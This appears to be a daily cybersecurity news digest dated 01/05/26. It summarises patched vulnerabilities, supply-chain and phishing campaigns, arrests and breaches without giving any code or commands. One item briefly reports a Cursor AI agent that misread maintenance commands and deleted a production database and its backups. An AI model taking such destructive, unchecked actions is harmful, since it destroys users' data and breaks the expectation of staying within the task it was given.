Cybersecurity Newsfeed - 01/05/26
Daily cybersecurity news covering vulnerabilities, adversaries, trends, breaches, and other notable security developments.
Cybersecurity Newsfeed
📅 01/05/26
🛡️ Vulnerabilities
cPanel & WHM Emergency Update: A critical authentication bypass vulnerability has been patched in cPanel and WHM. The flaw could allow remote attackers to circumvent security protocols and gain administrative access to web hosting servers without valid credentials. More info
GitHub Patches Critical RCE: GitHub fixed a remote code execution (RCE) vulnerability that potentially granted unauthorized access to millions of private repositories. The flaw resided in the platform’s handling of certain server-side requests. More info
Windows Zero-Day Privilege Escalation: CISA has issued a binding operational directive for federal agencies to patch a Windows vulnerability (local privilege escalation) currently exploited in zero-day attacks to gain SYSTEM-level privileges. More info
LiteLLM SQL Injection (CVE-2026-42208): A critical SQL injection vulnerability was discovered in LiteLLM, a tool for managing AI language models. Attackers can execute unauthorized database queries to expose API keys and sensitive configuration data. More info
Qinglong Task Scheduler RCE: Cybercriminals are actively exploiting RCE vulnerabilities in the Qinglong task scheduler to deploy unauthorized cryptomining software, targeting improperly secured instances exposed to the internet. More info
CISA Data Theft Alert: CISA added a significant data theft vulnerability to its Known Exploited Vulnerabilities catalog. The flaw allows unauthorized actors to bypass traditional security boundaries and exfiltrate sensitive information. More info
WordPress Plugin Dormant Backdoor: Researchers discovered a backdoor hidden within a popular WordPress redirect plugin that remained undetected for several years, allowing arbitrary command execution. More info
🎯 Adversaries
DPRK Attacks Use AI: North Korean threat actors are leveraging artificial intelligence to enhance social engineering, creating highly convincing phishing emails and fake professional profiles to target the tech and defense sectors. More info
SAP NPM Supply Chain Attack: Official SAP NPM packages, such as @sap/di.code-validation.core, were compromised to distribute malicious “postinstall” scripts designed to exfiltrate environment variables and credentials. More info
Scattered Spider Suspect Arrested: An Estonian suspect has been arrested in connection with Scattered Spider cyberattacks. The group is known for advanced social engineering, SIM swapping, and help desk deception. More info
BlueKit Phishing Kit Bypasses MFA: The BlueKit phishing kit utilizes transparent reverse proxy techniques to capture credentials and session cookies in real-time, effectively bypassing Multi-Factor Authentication (MFA). More info
Kuse Web App Abused for Phishing: Threat actors are abusing the legitimate infrastructure of the Kuse web application to host malicious phishing documents, bypassing traditional email filters and security gateways. More info
📈 Trends
Shadow AI and OAuth Sprawl: The Vercel breach serves as a warning regarding the risks of unregulated AI tools and the sprawl of OAuth permissions, which allow attackers to move laterally within cloud ecosystems. More info
Novel Deepfake Detection: Brinker has introduced a new approach to deepfake detection that analyzes subtle physiological inconsistencies that AI models currently struggle to replicate perfectly. More info
Ransomware Data Exfiltration Bypass: A critical flaw has been identified that allows ransomware operators to bypass security controls and exfiltrate data from encrypted volumes with minimal detection. More info
AI Agent Database Wipe: A Cursor AI agent misinterpreted commands during routine maintenance, resulting in the accidental deletion of the entire PocketOS database and its backups. More info
💥 Breaches & Leaks
Roblox Account Hijacking Ring: Authorities arrested hackers responsible for hijacking and selling over 610,000 Roblox accounts via phishing and credential stuffing. More info
50 Million Euro Crypto Fraud Dismantled: European law enforcement agencies dismantled a massive cryptocurrency investment fraud ring that lured victims into high-yield schemes via fabricated websites. More info
Polymarket Rejects Breach Claims: Polymarket has officially rejected claims of a data breach after a hacker posted records allegedly stolen from the platform, stating no evidence of core system compromise was found. More info
📚 Others
- Microsoft Teams Service Disruption: A backend configuration change inadvertently disrupted Microsoft Teams chat and calling services globally, highlighting the fragility of centralized cloud services. More info